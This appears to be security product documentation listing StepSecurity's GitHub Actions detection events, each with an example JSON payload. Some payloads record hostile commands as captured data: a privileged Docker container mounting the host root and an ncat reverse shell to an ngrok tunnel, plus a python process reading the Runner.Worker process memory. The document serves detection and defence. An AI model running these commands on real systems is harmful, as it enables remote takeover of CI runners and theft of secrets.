Integrations

StepSecurity supports integrations with external platforms to enhance your security workflows, automate telemetry export, and streamline policy enforcement.

We currently support two third-party integrations:

Detection Scenarios

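Each detection event is emitted in real time and includes detailed metadata about the workflow, job, detection, and offending artifacts. Below is a list of detection types currently supported by StepSecurity, along with an example payload for each. The field set varies by detection type: in the examples below, `job`, `workflow_id` and `owner_repo` are not present in every payload, top-level `timestamp` values are epoch-second strings while `process_events` timestamps are RFC 3339 strings, and a few examples use placeholders (`...`, `true/false`, `[hash]`) instead of literal values. Consumers should therefore parse these events tolerantly and treat values such as `endpoint`, `host`, `path` and `process_events[].arguments` as untrusted data originating from the monitored workflow run, escaping them before display or use in queries.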

Action-Uses-Commit-From-Non-Default-Branch

{
"id": "Action-Uses-Commit-From-Non-Default-Branch",
"name": "Action Uses Commit From Non Default Branch",
"owner": "actions-security-demo",
"repo": "actions-security-demo/poc-1",
"workflow_id": "actions-security-demo-actions-security-demo/poc-1-.github-workflows-test-workflow.yaml",
"workflow_path": ".github/workflows/test-workflow.yaml",
"run_id": "14372875584",
"job_id": "40299087623",
"job": "Test",
"timestamp": "1744262248",
"detection": "Action-Uses-Commit-From-Non-Default-Branch-14372875584-40299087623",
"id_timestamp": "Action-Uses-Commit-From-Non-Default-Branch-1744262248",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"imposter_commit": {
"action": "ashishkurmi/hello-action",
"tag": "main",
"sha": "c5327f7d9d31e29e58e788cb3c2727f773b3d0c4",
"timestamp": "1744262248"
  }
}

Action-Uses-Imposter-Commit

{
  "id": "Action-Uses-Imposter-Commit",
  "name": "GitHub Action Uses Imposter Commit",
  "owner": "step-security",
  "repo": "poc-workflows",
  "workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
  "workflow_path": ".github/workflows/poc_workflow.yml",
  "run_id": "16450863125",
  "job_id": "46495445268",
  "job": "imposter-commit",
  "timestamp": "1753203994",
  "detection": "Action-Uses-Imposter-Commit-step-security/dummy-compromised-action-c96c327cecdb71e8f031080ba8ad208feb25b13d",
  "id_timestamp": "Action-Uses-Imposter-Commit-1753203994",
  "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
  "imposter_commit": {
    "action": "step-security/dummy-compromised-action",
    "tag": "v1",
    "sha": "c96c327cecdb71e8f031080ba8ad208feb25b13d",
    "timestamp": "1753203994",
    "is_imposter_commit": true,
    "is_commit_on_default_branch": false
  },
  "owner_repo": "step-security/poc-workflows"
}

Domain-Blocked

{
  "id": "Domain-Blocked",
  "name": "Domain Blocked",
  "owner": "step-security",
  "repo": "poc-workflows",
  "workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
  "workflow_path": ".github/workflows/poc_workflow.yml",
  "run_id": "16450863125",
  "job_id": "46495445322",
  "endpoint": "0.tcp.us-cal-1.ngrok.io.",
  "timestamp": "1753204032",
  "detection": "Domain-Blocked-0.tcp.us-cal-1.ngrok.io.",
  "id_timestamp": "Domain-Blocked-1753204032",
  "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
  "owner_repo": "step-security/poc-workflows"
}

HTTPS-Outbound-Network-Call

{
  "id": "HTTPS-Outbound-Network-Call",
  "name": "HTTPS Outbound Call",
  "owner": "step-security",
  "repo": "poc-workflows",
  "workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
  "workflow_path": ".github/workflows/poc_workflow.yml",
  "run_id": "16450863125",
  "job_id": "46495445302",
  "timestamp": "1753204001",
  "detection": "HTTPS-Outbound-Network-Call-POST-api.github.com",
  "method": "POST",
  "host": "api.github.com",
  "path": "/repos/step-security-experiments/github-actions-goat/actions/runners/registration-token",
  "id_timestamp": "HTTPS-Outbound-Network-Call-1753204001",
  "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
  "owner_repo": "step-security/poc-workflows"
}

New-Outbound-Network-Call

{
  "id": "New-Outbound-Network-Call",
  "name": "New Outbound Network Call",
  "owner": "step-security",
  "repo": "poc-workflows",
  "workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
  "workflow_path": ".github/workflows/poc_workflow.yml",
  "run_id": "16450863125",
  "job_id": "46495445257",
  "job": "anomalous-outbound-call",
  "endpoint": "5ad46aa12a0f0fc0.example.com:443",
  "timestamp": "1753204032",
  "detection": "New-Outbound-Network-Call-5ad46aa12a0f0fc0.example.com:443",
  "expected_outbound_connections": [
    "github.com:443",
    "www.google.com:443",
    "goreleaser.com:443",
    "7f6045df5f070c28.example.com:443",
    "f6daed2a23eaf1c1.example.com:443",
    "4baf29081c970e17.example.com:443",
    "98a77cfd80e40ed6.example.com:443",
    "0de402b8ec115cc9.example.com:443"
  ],
  "id_timestamp": "New-Outbound-Network-Call-1753204032",
  "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
  "owner_repo": "step-security/poc-workflows"
}

Privileged-Container

{
  "id": "Privileged-Container",
  "name": "Privileged Container Detected",
  "owner": "step-security",
  "repo": "poc-workflows",
  "workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
  "workflow_path": ".github/workflows/poc_workflow.yml",
  "run_id": "16450863125",
  "job_id": "46495445255",
  "job": "privileged-conatiner",
  "timestamp": "1753203999",
  "detection": "Privileged-Container-privileged-conatiner",
  "id_timestamp": "Privileged-Container-1753203999",
  "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
  "owner_repo": "step-security/poc-workflows",
  "process_events": [
    {
      "pid": "2489",
      "ppid": "2488",
      "exe": "/usr/bin/docker",
      "working_directory": "/home/runner/work/poc-workflows/poc-workflows",
      "arguments": [
        "docker",
        "run",
        "--privileged",
        "--cap-add=ALL",
        "-v",
        "/:/host",
        "raesene/ncat:latest",
        "0.tcp.us-cal-1.ngrok.io",
        "17658",
        "-e",
        "/bin/bash"
      ],
      "timestamp": "2025-07-22T17:06:39.374Z"
    }
  ]
}

Reverse-Shell

{
  "id": "Reverse-Shell",
  "name": "Reverse shell detected",
  "owner": "step-security",
  "repo": "poc-workflows",
  "workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
  "workflow_path": ".github/workflows/poc_workflow.yml",
  "run_id": "16450863125",
  "job_id": "46495445255",
  "job": "privileged-conatiner",
  "timestamp": "1753204005",
  "detection": "Reverse-Shell-privileged-conatiner",
  "id_timestamp": "Reverse-Shell-1753204005",
  "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
  "owner_repo": "step-security/poc-workflows",
  "process_events": [
    {
      "pid": "2569",
      "ppid": "2547",
      "exe": "/usr/local/bin/ncat",
      "working_directory": "/",
      "arguments": [
        "/usr/local/bin/ncat",
        "0.tcp.us-cal-1.ngrok.io",
        "17658",
        "-e",
        "/bin/bash"
      ],
      "timestamp": "2025-07-22T17:06:45.265Z"
    }
  ]
}

Runner-Worker-Memory-Read

{
  "id": "Runner-Worker-Memory-Read",
  "name": "Runner Worker Memory Read",
  "owner": "step-security",
  "repo": "armour-tests",
  "workflow_id": "step-security-armour-tests-.github-workflows-poc_workflow.yml",
  "workflow_path": ".github/workflows/poc_workflow.yml",
  "run_id": "16463564626",
  "job_id": "46535652393",
  "job": "tj-actions-simulation",
  "timestamp": "1753253227",
  "detection": "Runner-Worker-Memory-Read-tj-actions-simulation",
  "id_timestamp": "Runner-Worker-Memory-Read-1753253227",
  "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
  "owner_repo": "step-security/armour-tests",
  "process_events": [
    {
      "pid": "2068",
      "exe": "python3",
      "timestamp": "2025-07-23T06:47:07.869380629Z",
      "armour_event_process": {
        "armour_event_kind": "FILE_READ",
        "timestamp": "2025-07-23T06:47:07.869380629Z",
        "file_info": {
          "is_write": false,
          "current_pid": 2068,
          "current_exe": "python3",
          "target_file": "/proc/1798/mem",
          "target_pid": 1798,
          "target_exe": "Runner.Worker"
        },
        "enforced_protection": false
      }
    }
  ]
}

Secret-In-Build-Log

{
  "id": "Secret-In-Build-Log",
  "name": "Secret In Build Log",
  "owner": "step-security",
  "repo": "poc-workflows",
  "workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
  "workflow_path": ".github/workflows/poc_workflow.yml",
  "run_id": "16450863125",
  "job_id": "46495445378",
  "timestamp": "1753204001",
  "detection": "Secret-In-Build-Log-handle-private-key-private-key",
  "secret": "----*******************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************--",
  "line_number": "14",
  "rule_id": "private-key",
  "job_name": "handle-private-key",
  "step_number": "5",
  "id_timestamp": "Secret-In-Build-Log-1753204001",
  "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
  "owner_repo": "step-security/poc-workflows"
}

Source-Code-Overwritten

{
  "id": "Source-Code-Overwritten",
  "name": "Source Code Overwritten",
  "owner": "step-security",
  "repo": "armour-tests",
  "workflow_id": "step-security-armour-tests-.github-workflows-poc_workflow.yml",
  "workflow_path": ".github/workflows/poc_workflow.yml",
  "run_id": "16476557099",
  "job_id": "46579649138",
  "job": "source-code",
  "file": "README.MD",
  "timestamp": "1753288775",
  "detection": "Source-Code-Overwritten-README.MD",
  "path": "/home/runner/work/armour-tests/armour-tests/README.MD",
  "id_timestamp": "Source-Code-Overwritten-1753288775",
  "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
  "owner_repo": "step-security/armour-tests"
}

Actions-Policy-Blocked

{
    "id": "Actions-Policy-Blocked",
    "name": "Actions Policy Blocked",
    "owner": "step-security",
    "repo": "arm-int-tests",
    "workflow_path": ".github/workflows/poc_workflow_int.yml",
    "run_id": "16625207256",
    "timestamp": "1753885200",
    "detection": "Actions-Policy-Blocked-16625207256",
    "id_timestamp": "1753885200",
    "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
    "actions_not_allowed": [
      "step-security/harden-runner@rc-20-int",
      "actions/checkout@v3",
      "step-security/dummy-compromised-action@v1",
      "actions/checkout@v4"
    ]
  }

Runs-On-Policy-Blocked

{
    "id": "Runs-On-Policy-Blocked",
    "name": "Runs-On Policy Blocked",
    "owner": "step-security",
    "repo": "arm-int-tests",
    "workflow_path": ".github/workflows/poc_workflow_int.yml",
    "run_id": "16625207256",
    "timestamp": "1753885200",
    "detection": "Runs-On-Policy-Blocked-16625207256",
    "id_timestamp": "Runs-On-Policy-Blocked-1753885200",
    "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
    "runs_on_labels_not_allowed": ["label1", "label2", ...]
  }

Secrets-Policy-Blocked

{
    "id": "Secrets-Policy-Blocked",
    "name": "Secrets Policy Blocked",
    "owner": "step-security",
    "repo": "arm-int-tests",
    "workflow_path": ".github/workflows/poc_workflow_int.yml",
    "run_id": "16625207256",
    "timestamp": "1753885200",
    "detection": "Secrets-Policy-Blocked-16625207256",
    "id_timestamp": "Secrets-Policy-Blocked-1753885200",
    "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
    "workflow_contains_secrets": "true/false",
    "is_non_default_branch": "true/false",
    "workflow_matches_default_ref": "true/false",
    "current_branch_hash": "[hash]",
    "default_branch_hash": "[hash]"
  }

Compromised-Actions-Policy-Blocked

{
    "id": "Compromised-Actions-Policy-Blocked",
    "name": "Compromised Actions Policy Blocked",
    "owner": "step-security",
    "repo": "arm-int-tests",
    "workflow_path": ".github/workflows/poc_workflow_int.yml",
    "run_id": "16625207256",
    "timestamp": "1753885200",
    "detection": "Compromised-Actions-Policy-Blocked-16625207256",
    "id_timestamp": "Compromised-Actions-Policy-Blocked-1753885200",
    "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
    "compromised_actions_detected": ["compromised-action1", "compromised-action2", ...]
  }
